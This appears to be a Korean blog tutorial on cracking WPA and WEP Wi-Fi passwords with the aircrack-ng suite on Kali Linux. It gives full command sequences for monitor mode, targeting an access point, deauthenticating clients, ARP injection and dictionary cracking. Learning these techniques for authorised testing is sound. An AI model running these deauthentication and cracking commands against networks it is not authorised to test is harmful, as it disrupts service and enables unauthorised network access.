VMware 환경 및 칼리 리눅스에서 무선 AP 침투를 수행합니다.
침투 수행에 앞서 무선 USB 랜카드를 VMware에 연결 시킵니다. (USB 포트에 삽입하여 VMware로 연결)
무선 AP 침투 시 WPA 방식과 WEP 방식이 존재하며, 암호화 방식에 따라 사용되는 공격 절차가 상이합니다.
WPA Crack 절차
1. sudo airmon-ng check kill
(프로세스 간섭을 제거함)
2. sudo airmon-ng start wlan0
(인터페이스 설정 및 동작 시작함)
3. iwconfig
((monitor)모니터 모드로 변경 되었는지 확인 - 생략해도 무관함)
4. sudo airodump-ng wlan0
(무선 AP를 스캔함)
5. sudo airodump-ng wlan0 --channel 11 --bssid E6:23:D3:4D:95:76 -w savecap (savecap은 캡쳐 파일명)
(패스워드를 크랙할 타겟 AP를 지정함)
(C: 타겟 AP의 채널, BSSID: 타겟AP의 MAC주소, ESSID: 타겟 AP의 이름)
두 가지 방법으로 나뉨 단일 기기 연결을 끊을지 전체 기기 연결을 끊을지, 보통 무선 AP 침투 시 6-1번으로 진행함
6. sudo aireplay-ng --deauth 30 -a E6:23:D3:4D:95:76 -c 82:73:30:53:DB:4F wlan0
(단일 대상 연결 끊기)
( --deauth: 강제 연결 및 재인증 시도, -a: 타겟 AP MAC주소, -c: station MAC주소, station이란 무선 AP에 접속한 무선 기기를 의미함)
6-1. sudo aireplay-ng --deauth 30 -a E6:23:D3:4D:95:76 -h E6:23:D3:4D:95:76 wlan0
(-a
(무선 AP에 연결된 모든 대상 연결 끊기)
( --deauth: 강제 연결 및 재인증 시도, -a: 타겟 AP MAC주소, -h: 타겟 AP MAC주소로 deauth를 시도하여 전체 기기 연결 해제 및 재인증 시도를 유도함)
deauth 동작을 과하게 유발 시 자동 재연결(재인증)이 동작되지 않아, 실제 장애를 유발할 수 있어
deauth 값을 30 이하로 하는게 안전해보임 > --deauth 30
7. sudo aircrack-ng savecap-01.cap -w /home/kali/Desktop/wpa_password.txt
(WPA 패스워드 크랙)
(savecap으로 저장했으나 savecap-01.cap으로 일부 추가되어 자동 저장됨, wpa_password.txt 파일은 사전 파일임)
8. sudo airmon-ng stop wlan0
(인터페이스 설정 및 동작 멈춤, 모니터 모드 비활성화)
채널 오류 발생 시
예시) wlan0 is on channel 10, but the AP uses channel 9
해답1) sudo iwconfig wlan0 channel 9 로 명령어 입력
해답2) 그냥 다시 6번 또는 6-1번 명령어 재실행
WEP Crack 절차
1. sudo airmon-ng check kill
(프로세스 간섭을 제거함)
2. sudo airmon-ng start wlan0
(인터페이스 설정 및 동작 시작함)
3. iwconfig
((monitor)모니터 모드로 변경 되었는지 확인 - 생략해도 무관함)
4. sudo airodump-ng wlan0
(무선 AP를 스캔함)
5. sudo airodump-ng wlan0 --channel 11 --bssid E6:23:D3:4D:95:76 -w savecap (savecap은 캡쳐 파일명)
(패스워드를 크랙할 타겟 AP를 지정함)
(수집할 IV는 데이터 패킷에 들어있으며 IV가 많아야 키 전채 내용 알 수있음
수집해야할 데이터 양은 100000개 이상 캡처되어야 failed가 안뜨는듯함)
6. aireplay-ng -1 5000 -a [ap의 mac주소] wlan0
(fake injection - 가짜 인증을 진행함)
(5000 > 5초에 1번씩 보냄)
7. aireplay-ng -3 -b [ap의 mac주소] wlan0
(arp injection - arp reply 유발을 통해 패킷을 빠르게 수집함)
8. sudo aircrack-ng savecap-01.cap
(WEP 패스워드 크랙)
9. sudo airmon-ng stop wlan0
(인터페이스 설정 및 동작 멈춤, 모니터 모드 비활성화)
'보안 도구 사용방법' 카테고리의 다른 글
칼리 리눅스 히드라 사용법 (0) | 2023.09.10 |
---|---|
BurpSuite의 HTTPS/HTTP/Localhost 프록시 종합 설정 (1) | 2020.03.15 |
무선WiFi(OTA)를 이용한 IoT 인증서 업로드 및 통신 (0) | 2020.02.06 |
Mosquitto Broker를 이용한 MQTT 암호화 통신 방법 & OpenSSL 인증서 사용 방법 (0) | 2019.12.29 |
CentOS OpenSSL 설치 (0) | 2019.12.22 |